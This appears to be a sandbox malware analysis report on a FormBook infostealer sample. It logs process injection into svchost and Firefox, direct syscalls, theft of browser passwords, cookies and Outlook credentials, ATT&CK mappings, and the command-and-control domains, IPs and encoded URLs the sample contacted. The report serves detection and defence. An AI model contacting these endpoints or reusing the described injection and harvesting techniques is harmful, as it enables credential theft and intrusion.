            Source: C:\Program Files (x86)\nAEwFNjrDKmEnHYevQyBsADnPXAqBgVjtCsIwACn\GmuPchEfAM.exeNtQueryVolumeInformationFile: Direct from: 0x77542F2CJump to behavior
            Source: C:\Program Files (x86)\nAEwFNjrDKmEnHYevQyBsADnPXAqBgVjtCsIwACn\GmuPchEfAM.exeNtOpenSection: Direct from: 0x77542E0CJump to behavior
            Source: C:\Program Files (x86)\nAEwFNjrDKmEnHYevQyBsADnPXAqBgVjtCsIwACn\GmuPchEfAM.exeNtAllocateVirtualMemory: Direct from: 0x775448ECJump to behavior
            Source: C:\Program Files (x86)\nAEwFNjrDKmEnHYevQyBsADnPXAqBgVjtCsIwACn\GmuPchEfAM.exeNtSetInformationThread: Direct from: 0x775363F9Jump to behavior
            Source: C:\Program Files (x86)\nAEwFNjrDKmEnHYevQyBsADnPXAqBgVjtCsIwACn\GmuPchEfAM.exeNtQuerySystemInformation: Direct from: 0x775448CCJump to behavior
            Source: C:\Program Files (x86)\nAEwFNjrDKmEnHYevQyBsADnPXAqBgVjtCsIwACn\GmuPchEfAM.exeNtClose: Direct from: 0x77542B6C
            Source: C:\Program Files (x86)\nAEwFNjrDKmEnHYevQyBsADnPXAqBgVjtCsIwACn\GmuPchEfAM.exeNtReadVirtualMemory: Direct from: 0x77542E8CJump to behavior
            Source: C:\Program Files (x86)\nAEwFNjrDKmEnHYevQyBsADnPXAqBgVjtCsIwACn\GmuPchEfAM.exeNtCreateKey: Direct from: 0x77542C6CJump to behavior
            Source: C:\Program Files (x86)\nAEwFNjrDKmEnHYevQyBsADnPXAqBgVjtCsIwACn\GmuPchEfAM.exeNtSetInformationThread: Direct from: 0x77542B4CJump to behavior
            Source: C:\Program Files (x86)\nAEwFNjrDKmEnHYevQyBsADnPXAqBgVjtCsIwACn\GmuPchEfAM.exeNtQueryAttributesFile: Direct from: 0x77542E6CJump to behavior
            Source: C:\Program Files (x86)\nAEwFNjrDKmEnHYevQyBsADnPXAqBgVjtCsIwACn\GmuPchEfAM.exeNtAllocateVirtualMemory: Direct from: 0x77543C9CJump to behavior
            Source: C:\Program Files (x86)\nAEwFNjrDKmEnHYevQyBsADnPXAqBgVjtCsIwACn\GmuPchEfAM.exeNtCreateUserProcess: Direct from: 0x7754371CJump to behavior
            Source: C:\Program Files (x86)\nAEwFNjrDKmEnHYevQyBsADnPXAqBgVjtCsIwACn\GmuPchEfAM.exeNtQueryInformationProcess: Direct from: 0x77542C26Jump to behavior
            Source: C:\Program Files (x86)\nAEwFNjrDKmEnHYevQyBsADnPXAqBgVjtCsIwACn\GmuPchEfAM.exeNtResumeThread: Direct from: 0x77542FBCJump to behavior
            Source: C:\Program Files (x86)\nAEwFNjrDKmEnHYevQyBsADnPXAqBgVjtCsIwACn\GmuPchEfAM.exeNtWriteVirtualMemory: Direct from: 0x7754490CJump to behavior
            Source: C:\Program Files (x86)\nAEwFNjrDKmEnHYevQyBsADnPXAqBgVjtCsIwACn\GmuPchEfAM.exeNtDelayExecution: Direct from: 0x77542DDCJump to behavior
            Source: C:\Program Files (x86)\nAEwFNjrDKmEnHYevQyBsADnPXAqBgVjtCsIwACn\GmuPchEfAM.exeNtAllocateVirtualMemory: Direct from: 0x77542BFCJump to behavior
            Source: C:\Program Files (x86)\nAEwFNjrDKmEnHYevQyBsADnPXAqBgVjtCsIwACn\GmuPchEfAM.exeNtReadFile: Direct from: 0x77542ADCJump to behavior
            Source: C:\Program Files (x86)\nAEwFNjrDKmEnHYevQyBsADnPXAqBgVjtCsIwACn\GmuPchEfAM.exeNtQuerySystemInformation: Direct from: 0x77542DFCJump to behavior
            Source: C:\Program Files (x86)\nAEwFNjrDKmEnHYevQyBsADnPXAqBgVjtCsIwACn\GmuPchEfAM.exeNtResumeThread: Direct from: 0x775436ACJump to behavior
            Source: C:\Program Files (x86)\nAEwFNjrDKmEnHYevQyBsADnPXAqBgVjtCsIwACn\GmuPchEfAM.exeNtNotifyChangeKey: Direct from: 0x77543C2CJump to behavior
            Source: C:\Program Files (x86)\nAEwFNjrDKmEnHYevQyBsADnPXAqBgVjtCsIwACn\GmuPchEfAM.exeNtCreateMutant: Direct from: 0x775435CCJump to behavior
            Source: C:\Program Files (x86)\nAEwFNjrDKmEnHYevQyBsADnPXAqBgVjtCsIwACn\GmuPchEfAM.exeNtWriteVirtualMemory: Direct from: 0x77542E3CJump to behavior
            Source: C:\Program Files (x86)\nAEwFNjrDKmEnHYevQyBsADnPXAqBgVjtCsIwACn\GmuPchEfAM.exeNtMapViewOfSection: Direct from: 0x77542D1CJump to behavior
            Maps a DLL or memory area into another process
            Source: C:\Users\user\Desktop\YSjOEAta07.exeSection loaded: NULL target: C:\Windows\SysWOW64\svchost.exe protection: execute and read and writeJump to behavior
            Source: C:\Windows\SysWOW64\svchost.exeSection loaded: NULL target: C:\Program Files (x86)\nAEwFNjrDKmEnHYevQyBsADnPXAqBgVjtCsIwACn\GmuPchEfAM.exe protection: execute and read and writeJump to behavior
            Source: C:\Windows\SysWOW64\svchost.exeSection loaded: NULL target: C:\Windows\SysWOW64\replace.exe protection: execute and read and writeJump to behavior
            Source: C:\Windows\SysWOW64\replace.exeSection loaded: NULL target: C:\Program Files (x86)\nAEwFNjrDKmEnHYevQyBsADnPXAqBgVjtCsIwACn\GmuPchEfAM.exe protection: read writeJump to behavior
            Source: C:\Windows\SysWOW64\replace.exeSection loaded: NULL target: C:\Program Files (x86)\nAEwFNjrDKmEnHYevQyBsADnPXAqBgVjtCsIwACn\GmuPchEfAM.exe protection: execute and read and writeJump to behavior
            Source: C:\Windows\SysWOW64\replace.exeSection loaded: NULL target: C:\Program Files\Mozilla Firefox\firefox.exe protection: read writeJump to behavior
            Source: C:\Windows\SysWOW64\replace.exeSection loaded: NULL target: C:\Program Files\Mozilla Firefox\firefox.exe protection: execute and read and writeJump to behavior
            Modifies the context of a thread in another process (thread injection)
            Source: C:\Windows\SysWOW64\replace.exeThread register set: target process: 7296Jump to behavior
            Queues an APC in another process (thread injection)
            Source: C:\Windows\SysWOW64\replace.exeThread APC queued: target process: C:\Program Files (x86)\nAEwFNjrDKmEnHYevQyBsADnPXAqBgVjtCsIwACn\GmuPchEfAM.exeJump to behavior
            Writes to foreign memory regions
            Source: C:\Users\user\Desktop\YSjOEAta07.exeMemory written: C:\Windows\SysWOW64\svchost.exe base: 30B1008Jump to behavior
            Source: C:\Users\user\Desktop\YSjOEAta07.exeProcess created: C:\Windows\SysWOW64\svchost.exe "C:\Users\user\Desktop\YSjOEAta07.exe"Jump to behavior
            Source: C:\Program Files (x86)\nAEwFNjrDKmEnHYevQyBsADnPXAqBgVjtCsIwACn\GmuPchEfAM.exeProcess created: C:\Windows\SysWOW64\replace.exe "C:\Windows\SysWOW64\replace.exe"Jump to behavior
            Source: C:\Windows\SysWOW64\replace.exeProcess created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\Firefox.exe"Jump to behavior
            Source: GmuPchEfAM.exe, 00000003.00000000.1411851059.0000000000D31000.00000002.00000001.00040000.00000000.sdmp, GmuPchEfAM.exe, 00000003.00000002.3168923837.0000000000D31000.00000002.00000001.00040000.00000000.sdmp, GmuPchEfAM.exe, 00000008.00000002.3169414293.0000000001331000.00000002.00000001.00040000.00000000.sdmpBinary or memory string: Program Manager
            Source: GmuPchEfAM.exe, 00000003.00000000.1411851059.0000000000D31000.00000002.00000001.00040000.00000000.sdmp, GmuPchEfAM.exe, 00000003.00000002.3168923837.0000000000D31000.00000002.00000001.00040000.00000000.sdmp, GmuPchEfAM.exe, 00000008.00000002.3169414293.0000000001331000.00000002.00000001.00040000.00000000.sdmpBinary or memory string: Shell_TrayWnd
            Source: GmuPchEfAM.exe, 00000003.00000000.1411851059.0000000000D31000.00000002.00000001.00040000.00000000.sdmp, GmuPchEfAM.exe, 00000003.00000002.3168923837.0000000000D31000.00000002.00000001.00040000.00000000.sdmp, GmuPchEfAM.exe, 00000008.00000002.3169414293.0000000001331000.00000002.00000001.00040000.00000000.sdmpBinary or memory string: Progman
            Source: GmuPchEfAM.exe, 00000003.00000000.1411851059.0000000000D31000.00000002.00000001.00040000.00000000.sdmp, GmuPchEfAM.exe, 00000003.00000002.3168923837.0000000000D31000.00000002.00000001.00040000.00000000.sdmp, GmuPchEfAM.exe, 00000008.00000002.3169414293.0000000001331000.00000002.00000001.00040000.00000000.sdmpBinary or memory string: Progmanlock
            Source: YSjOEAta07.exeBinary or memory string: JDASCRWINUPRWINDOWNLWINUPLWINDOWNSHIFTUPSHIFTDOWNALTUPALTDOWNCTRLUPCTRLDOWNMOUSE_XBUTTON2MOUSE_XBUTTON1MOUSE_MBUTTONMOUSE_RBUTTONMOUSE_LBUTTONLAUNCH_APP2LAUNCH_APP1LAUNCH_MEDIALAUNCH_MAILMEDIA_PLAY_PAUSEMEDIA_STOPMEDIA_PREVMEDIA_NEXTVOLUME_UPVOLUME_DOWNVOLUME_MUTEBROWSER_HOMEBROWSER_FAVORTIESBROWSER_SEARCHBROWSER_STOPBROWSER_REFRESHBROWSER_FORWARDBROWSER_BACKNUMPADENTERSLEEPRSHIFTLSHIFTRALTLALTRCTRLLCTRLAPPSKEYNUMPADDIVNUMPADDOTNUMPADSUBNUMPADADDNUMPADMULTNUMPAD9NUMPAD8NUMPAD7NUMPAD6NUMPAD5NUMPAD4NUMPAD3NUMPAD2NUMPAD1NUMPAD0CAPSLOCKPAUSEBREAKNUMLOCKSCROLLLOCKRWINLWINPRINTSCREENUPTABSPACERIGHTPGUPPGDNLEFTINSERTINSHOMEF12F11F10F9F8F7F6F5F4F3F2F1ESCAPEESCENTERENDDOWNDELETEDELBSBACKSPACEALTONOFF0%d%dShell_TrayWndExitScript Pausedblankinfoquestionstopwarning

            Stealing of Sensitive Information

            barindex
            Yara detected FormBook
            Source: Yara matchFile source: 2.2.svchost.exe.400000.0.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 2.2.svchost.exe.400000.0.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 00000008.00000002.3172358807.00000000050E0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000004.00000002.3169852732.00000000007D0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000004.00000002.3169964546.0000000000820000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000002.00000002.1489720857.0000000004200000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000002.00000002.1487968090.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000003.00000002.3169911650.0000000002470000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000004.00000002.3167311472.0000000000130000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000002.00000002.1488814205.00000000039A0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
            Tries to harvest and steal browser information (history, passwords, etc)
            Source: C:\Windows\SysWOW64\replace.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local StateJump to behavior
            Source: C:\Windows\SysWOW64\replace.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login DataJump to behavior
            Source: C:\Windows\SysWOW64\replace.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\CookiesJump to behavior
            Source: C:\Windows\SysWOW64\replace.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Local StateJump to behavior
            Source: C:\Windows\SysWOW64\replace.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\CookiesJump to behavior
            Source: C:\Windows\SysWOW64\replace.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web DataJump to behavior
            Source: C:\Windows\SysWOW64\replace.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login DataJump to behavior
            Source: C:\Windows\SysWOW64\replace.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\CookiesJump to behavior
            Tries to steal Mail credentials (via file / registry access)
            Source: C:\Windows\SysWOW64\replace.exeKey opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\Jump to behavior

            Remote Access Functionality

            barindex
            Yara detected FormBook
            Source: Yara matchFile source: 2.2.svchost.exe.400000.0.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 2.2.svchost.exe.400000.0.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 00000008.00000002.3172358807.00000000050E0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000004.00000002.3169852732.00000000007D0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000004.00000002.3169964546.0000000000820000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000002.00000002.1489720857.0000000004200000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000002.00000002.1487968090.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000003.00000002.3169911650.0000000002470000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000004.00000002.3167311472.0000000000130000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000002.00000002.1488814205.00000000039A0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY

            Mitre Att&ck Matrix

            ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
            Gather Victim Identity InformationAcquire InfrastructureValid AccountsWindows Management Instrumentation1
            DLL Side-Loading            		412
            Process Injection            		2
            Virtualization/Sandbox Evasion            		1
            OS Credential Dumping            		121
            Security Software Discovery            		Remote Services1
            Email Collection            		1
            Encrypted Channel            		Exfiltration Over Other Network MediumAbuse Accessibility Features
            CredentialsDomainsDefault AccountsScheduled Task/JobBoot or Logon Initialization Scripts1
            Abuse Elevation Control Mechanism            		412
            Process Injection            		LSASS Memory2
            Virtualization/Sandbox Evasion            		Remote Desktop Protocol1
            Archive Collected Data            		3
            Ingress Tool Transfer            		Exfiltration Over BluetoothNetwork Denial of Service
            Email AddressesDNS ServerDomain AccountsAtLogon Script (Windows)1
            DLL Side-Loading            		1
            Deobfuscate/Decode Files or Information            		Security Account Manager2
            Process Discovery            		SMB/Windows Admin Shares1
            Data from Local System            		4
            Non-Application Layer Protocol            		Automated ExfiltrationData Encrypted for Impact
            Employee NamesVirtual Private ServerLocal AccountsCronLogin HookLogin Hook1
            Abuse Elevation Control Mechanism            		NTDS1
            Application Window Discovery            		Distributed Component Object ModelInput Capture4
            Application Layer Protocol            		Traffic DuplicationData Destruction
            Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon ScriptNetwork Logon Script3
            Obfuscated Files or Information            		LSA Secrets2
            File and Directory Discovery            		SSHKeyloggingFallback ChannelsScheduled TransferData Encrypted for Impact
            Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC ScriptsRC Scripts1
            DLL Side-Loading            		Cached Domain Credentials12
            System Information Discovery            		VNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop

            Behavior Graph

            Hide Legend

            Legend:

            • Process
            • Signature
            • Created File
            • DNS/IP Info
            • Is Dropped
            • Is Windows Process
            • Number of created Registry Values
            • Number of created Files
            • Visual Basic
            • Delphi
            • Java
            • .Net C# or VB.NET
            • C, C++ or other language
            • Is malicious
            • Internet
            behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 1528155 Sample: YSjOEAta07.exe Startdate: 07/10/2024 Architecture: WINDOWS Score: 100 28 www.sterkus.xyz 2->28 30 www.moritynomxd.xyz 2->30 32 16 other IPs or domains 2->32 42 Malicious sample detected (through community Yara rule) 2->42 44 Antivirus / Scanner detection for submitted sample 2->44 46 Multi AV Scanner detection for submitted file 2->46 50 3 other signatures 2->50 10 YSjOEAta07.exe 1 2->10         started        signatures3 48 Performs DNS queries to domains with low reputation 30->48 process4 signatures5 62 Writes to foreign memory regions 10->62 64 Maps a DLL or memory area into another process 10->64 66 Switches to a custom stack to bypass stack traces 10->66 13 svchost.exe 10->13         started        process6 signatures7 68 Maps a DLL or memory area into another process 13->68 16 GmuPchEfAM.exe 13->16 injected process8 signatures9 40 Found direct / indirect Syscall (likely to bypass EDR) 16->40 19 replace.exe 13 16->19         started        process10 signatures11 52 Tries to steal Mail credentials (via file / registry access) 19->52 54 Tries to harvest and steal browser information (history, passwords, etc) 19->54 56 Modifies the context of a thread in another process (thread injection) 19->56 58 3 other signatures 19->58 22 GmuPchEfAM.exe 19->22 injected 26 firefox.exe 19->26         started        process12 dnsIp13 34 www.sterkus.xyz 209.74.95.29, 49988, 49989, 49990 MULTIBAND-NEWHOPEUS United States 22->34 36 www.moritynomxd.xyz 172.81.61.224, 49898, 80 ESITEDUS United States 22->36 38 7 other IPs or domains 22->38 60 Found direct / indirect Syscall (likely to bypass EDR) 22->60 signatures14

            Screenshots

            Thumbnails

            This section contains all screenshots as thumbnails, including those not shown in the slideshow.


            windows-stand

            Antivirus, Machine Learning and Genetic Malware Detection

            Initial Sample

            SourceDetectionScannerLabelLink
            YSjOEAta07.exe53%ReversingLabsWin32.Trojan.Leonem
            YSjOEAta07.exe100%AviraHEUR/AGEN.1321671
            YSjOEAta07.exe100%Joe Sandbox ML

            Dropped Files

            No Antivirus matches

            Unpacked PE Files

            No Antivirus matches

            Domains

            No Antivirus matches

            URLs

            SourceDetectionScannerLabelLink
            https://duckduckgo.com/chrome_newtab0%URL Reputationsafe
            https://duckduckgo.com/ac/?q=0%URL Reputationsafe
            https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=0%URL Reputationsafe
            https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=0%URL Reputationsafe
            https://www.ecosia.org/newtab/0%URL Reputationsafe
            https://ac.ecosia.org/autocomplete?q=0%URL Reputationsafe
            https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search0%URL Reputationsafe
            https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=0%URL Reputationsafe

            Domains and IPs

            Contacted Domains

            NameIPActiveMaliciousAntivirus DetectionReputation
            galaxyslot88rtp.lat
            		46.17.172.49
            		truefalse
              		unknown
              pakmartcentral.shop
              		84.32.84.32
              		truefalse
                		unknown
                tracy.club
                		3.33.130.190
                		truefalse
                  		unknown
                  warriorsyndrome.net
                  		3.33.130.190
                  		truefalse
                    		unknown
                    s-part-0017.t-0009.t-msedge.net
                    		13.107.246.45
                    		truefalse
                      		unknown
                      kovallo.cloud
                      		81.2.196.19
                      		truefalse
                        		unknown
                        sppsuperplast.online
                        		94.73.146.114
                        		truefalse
                          		unknown
                          www.moritynomxd.xyz
                          		172.81.61.224
                          		truetrue
                            		unknown
                            www.syncnodex.net
                            		15.197.172.60
                            		truefalse
                              		unknown
                              www.sterkus.xyz
                              		209.74.95.29
                              		truetrue
                                		unknown
                                ks1x7i.vip
                                		3.33.130.190
                                		truefalse
                                  		unknown
                                  www.les-massage.online
                                  		194.58.112.174
                                  		truefalse
                                    		unknown
                                    www.warriorsyndrome.net
                                    		unknown
                                    		unknowntrue
                                      		unknown
                                      www.galaxyslot88rtp.lat
                                      		unknown
                                      		unknowntrue
                                        		unknown
                                        www.kovallo.cloud
                                        		unknown
                                        		unknowntrue
                                          		unknown
                                          www.tracy.club
                                          		unknown
                                          		unknowntrue
                                            		unknown
                                            www.pakmartcentral.shop
                                            		unknown
                                            		unknowntrue
                                              		unknown
                                              www.sppsuperplast.online
                                              		unknown
                                              		unknowntrue
                                                		unknown
                                                www.ks1x7i.vip
                                                		unknown
                                                		unknowntrue
                                                  		unknown

                                                  Contacted URLs

                                                  NameMaliciousAntivirus DetectionReputation
                                                  http://www.syncnodex.net/xx1z/?EjLdUJJ=VQ273Por9tZNXcpnBjHyerHfPh3IuY3S8eL22/fuso5dBdPYMoEWGed6+bFxO5C9LYS/pyvuVKWKURQ6ZaqIRBLVhXVMqm8ByJItQpJ18i+00NseLA==&WLUDu=SXq8yrvPVd3tffalse
                                                    		unknown
                                                    http://www.tracy.club/fl4z/false
                                                      		unknown
                                                      http://www.kovallo.cloud/kmgk/false
                                                        		unknown
                                                        http://www.sppsuperplast.online/becc/false
                                                          		unknown
                                                          http://www.moritynomxd.xyz/v5tr/?WLUDu=SXq8yrvPVd3tf&EjLdUJJ=rKvRMuVKXCO914EMf6FJZqs15EwODFtrZQGlCKKDXZs+G4DSdFL+ryYGM1VkNXNOLhPAbMSex0AuWObt4o/1tiXGxnpWKIlAMdpeetvztbm0D0P/FQ==false
                                                            		unknown
                                                            http://www.warriorsyndrome.net/kzas/false
                                                              		unknown
                                                              http://www.ks1x7i.vip/uxh9/?WLUDu=SXq8yrvPVd3tf&EjLdUJJ=ws/IawdEHaoWNg/j/7Jh7udGjrT+7JNe46jOTwFB35qywQtlsi2lBgTXskhK1RztBb48nT9+3zT3nLR+G4pW1yQztlFWqraTHnGITGOJIT5K53AYpg==false
                                                                		unknown
                                                                http://www.sppsuperplast.online/becc/?EjLdUJJ=NMCgl399tF1pJwA6An/WBP0ajP560ZE7ZZq+0r9zHfOkYA3BHmcUXc8X+6X2iixUCsZsuiX+6YOVLq03j5m1hpFW51KlNbBS8GqvLsVmQjui7pqzBw==&WLUDu=SXq8yrvPVd3tffalse
                                                                  		unknown
                                                                  http://www.sterkus.xyz/ha8h/false
                                                                    		unknown
                                                                    http://www.galaxyslot88rtp.lat/lbpf/?EjLdUJJ=M+DfsBvEIkyOAb10y0dA+UDjYbUtqrwEKADScmdz2U7nr/YOsALJT64KSPaG4zh33A22H+qXr8/USoZXKjK9wtqtHM6pRVxdkXmhbbPLR4PLxBAP1w==&WLUDu=SXq8yrvPVd3tffalse
                                                                      		unknown
                                                                      http://www.sterkus.xyz/ha8h/?WLUDu=SXq8yrvPVd3tf&EjLdUJJ=PbxAaK8rSTbGZ+BUjIA4k1uuUYM0d40nW5ERHNgbkCm+3sg74DzBCze1WsCQlDZBoOF+IY6Xn812UFXfTFX6/3MPvQCQPMFuzfo+VK5cq25Wd2+yKQ==false
                                                                        		unknown
                                                                        http://www.ks1x7i.vip/uxh9/false
                                                                          		unknown
                                                                          http://www.warriorsyndrome.net/kzas/?EjLdUJJ=rYHw3+wcZ3MA1g8BlTjgV3gIUSr9tyXK9S6FoLDJmOPSIdlvtrqwrkb5B8iquLWNvXCfhDtVKXWhlby4MVAaJGgKmeWEiKc2IkdQLoOlpJ6MlzQWug==&WLUDu=SXq8yrvPVd3tffalse
                                                                            		unknown
                                                                            http://www.galaxyslot88rtp.lat/lbpf/false
                                                                              		unknown
                                                                              http://www.pakmartcentral.shop/ml5l/?EjLdUJJ=q39FRlrjXh2BAZ2an0Y0b+wnoW9u3vRxeQ2ev9PxWnLSwGTc53vym4zMKhd+m8E/J85vcAPus+7jLKqTLJL7q40+dEWWJZUlJWs+YYUwQiQqX1T+EQ==&WLUDu=SXq8yrvPVd3tffalse
                                                                                		unknown
                                                                                http://www.syncnodex.net/xx1z/false
                                                                                  		unknown
                                                                                  http://www.tracy.club/fl4z/?EjLdUJJ=jN3KkN8xc9fseqtyr4X8nJfH94tzQs+avQjwnfoXfZkRaIXL2JZC0r1JTtOX041q/8MEGRSGOm2xSpEpVpIzcp1KqIPIBJlEGfbNZZvmCXWpEmY6ZQ==&WLUDu=SXq8yrvPVd3tffalse
                                                                                    		unknown
                                                                                    http://www.pakmartcentral.shop/ml5l/false
                                                                                      		unknown
                                                                                      http://www.les-massage.online/74ou/false
                                                                                        		unknown
                                                                                        http://www.kovallo.cloud/kmgk/?EjLdUJJ=QukKnG46OQSX7O08sGKvg3RM3X3qAaYvhEJu7ZdGlt3+bssdK2PjljbXjRv2eFs2wJoIh8oMTDRJEFcKnARzRzkSQpK8SApNFtkA5U4MUp6J2Mz6QQ==&WLUDu=SXq8yrvPVd3tffalse
                                                                                          		unknown

                                                                                          URLs from Memory and Binaries

                                                                                          NameSourceMaliciousAntivirus DetectionReputation
                                                                                          https://htmlcodex.comreplace.exe, 00000004.00000002.3172177851.0000000003C6C000.00000004.10000000.00040000.00000000.sdmp, GmuPchEfAM.exe, 00000008.00000002.3170349737.00000000036DC000.00000004.00000001.00040000.00000000.sdmpfalse
                                                                                            		unknown
                                                                                            https://duckduckgo.com/chrome_newtabreplace.exe, 00000004.00000002.3174067922.00000000073EB000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                            • URL Reputation: safe
                                                                                            		unknown
                                                                                            http://www.les-massage.onlineGmuPchEfAM.exe, 00000008.00000002.3172358807.0000000005136000.00000040.80000000.00040000.00000000.sdmpfalse
                                                                                              		unknown
                                                                                              https://duckduckgo.com/ac/?q=replace.exe, 00000004.00000002.3174067922.00000000073EB000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                              • URL Reputation: safe
                                                                                              		unknown
                                                                                              https://cdn.jsdelivr.net/npm/bootstrapreplace.exe, 00000004.00000002.3172177851.0000000003C6C000.00000004.10000000.00040000.00000000.sdmp, GmuPchEfAM.exe, 00000008.00000002.3170349737.00000000036DC000.00000004.00000001.00040000.00000000.sdmpfalse
                                                                                                		unknown
                                                                                                https://cdnjs.cloudflare.com/ajax/libs/font-awesome/5.10.0/css/all.min.cssreplace.exe, 00000004.00000002.3172177851.0000000003C6C000.00000004.10000000.00040000.00000000.sdmp, GmuPchEfAM.exe, 00000008.00000002.3170349737.00000000036DC000.00000004.00000001.00040000.00000000.sdmpfalse
                                                                                                  		unknown
                                                                                                  https://login.live.creplace.exe, 00000004.00000002.3167953756.0000000000600000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                    		unknown
                                                                                                    https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=replace.exe, 00000004.00000002.3174067922.00000000073EB000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                    • URL Reputation: safe
                                                                                                    		unknown
                                                                                                    https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=replace.exe, 00000004.00000002.3174067922.00000000073EB000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                    • URL Reputation: safe
                                                                                                    		unknown
                                                                                                    http://sppsuperplast.online/becc/?EjLdUJJ=NMCgl399tF1pJwA6An/WBP0ajP560ZE7ZZqreplace.exe, 00000004.00000002.3172177851.0000000003948000.00000004.10000000.00040000.00000000.sdmp, GmuPchEfAM.exe, 00000008.00000002.3170349737.00000000033B8000.00000004.00000001.00040000.00000000.sdmpfalse
                                                                                                      		unknown
                                                                                                      https://code.jquery.com/jquery-3.4.1.min.jsreplace.exe, 00000004.00000002.3172177851.0000000003C6C000.00000004.10000000.00040000.00000000.sdmp, GmuPchEfAM.exe, 00000008.00000002.3170349737.00000000036DC000.00000004.00000001.00040000.00000000.sdmpfalse
                                                                                                        		unknown
                                                                                                        https://www.ecosia.org/newtab/replace.exe, 00000004.00000002.3174067922.00000000073EB000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                        • URL Reputation: safe
                                                                                                        		unknown
                                                                                                        https://cdn.jsdelivr.net/npm/bootstrap-iconsreplace.exe, 00000004.00000002.3172177851.0000000003C6C000.00000004.10000000.00040000.00000000.sdmp, GmuPchEfAM.exe, 00000008.00000002.3170349737.00000000036DC000.00000004.00000001.00040000.00000000.sdmpfalse
                                                                                                          		unknown
                                                                                                          https://ac.ecosia.org/autocomplete?q=replace.exe, 00000004.00000002.3174067922.00000000073EB000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                          • URL Reputation: safe
                                                                                                          		unknown
                                                                                                          https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/searchreplace.exe, 00000004.00000002.3174067922.00000000073EB000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                          • URL Reputation: safe
                                                                                                          		unknown
                                                                                                          https://htmlcodex.com/credit-removalreplace.exe, 00000004.00000002.3172177851.0000000003C6C000.00000004.10000000.00040000.00000000.sdmp, GmuPchEfAM.exe, 00000008.00000002.3170349737.00000000036DC000.00000004.00000001.00040000.00000000.sdmpfalse
                                                                                                            		unknown
                                                                                                            https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=replace.exe, 00000004.00000002.3174067922.00000000073EB000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                            • URL Reputation: safe
                                                                                                            		unknown

                                                                                                            World Map of Contacted IPs

                                                                                                            • No. of IPs < 25%
                                                                                                            • 25% < No. of IPs < 50%
                                                                                                            • 50% < No. of IPs < 75%
                                                                                                            • 75% < No. of IPs

                                                                                                            Public IPs

                                                                                                            IPDomainCountryFlagASNASN NameMalicious
                                                                                                            209.74.95.29
                                                                                                            		www.sterkus.xyzUnited States
                                                                                                            		31744MULTIBAND-NEWHOPEUStrue
                                                                                                            46.17.172.49
                                                                                                            		galaxyslot88rtp.latGermany
                                                                                                            		47583AS-HOSTINGERLTfalse
                                                                                                            84.32.84.32
                                                                                                            		pakmartcentral.shopLithuania
                                                                                                            		33922NTT-LT-ASLTfalse
                                                                                                            81.2.196.19
                                                                                                            		kovallo.cloudCzech Republic
                                                                                                            		24806INTERNET-CZKtis238403KtisCZfalse
                                                                                                            194.58.112.174
                                                                                                            		www.les-massage.onlineRussian Federation
                                                                                                            		197695AS-REGRUfalse
                                                                                                            3.33.130.190
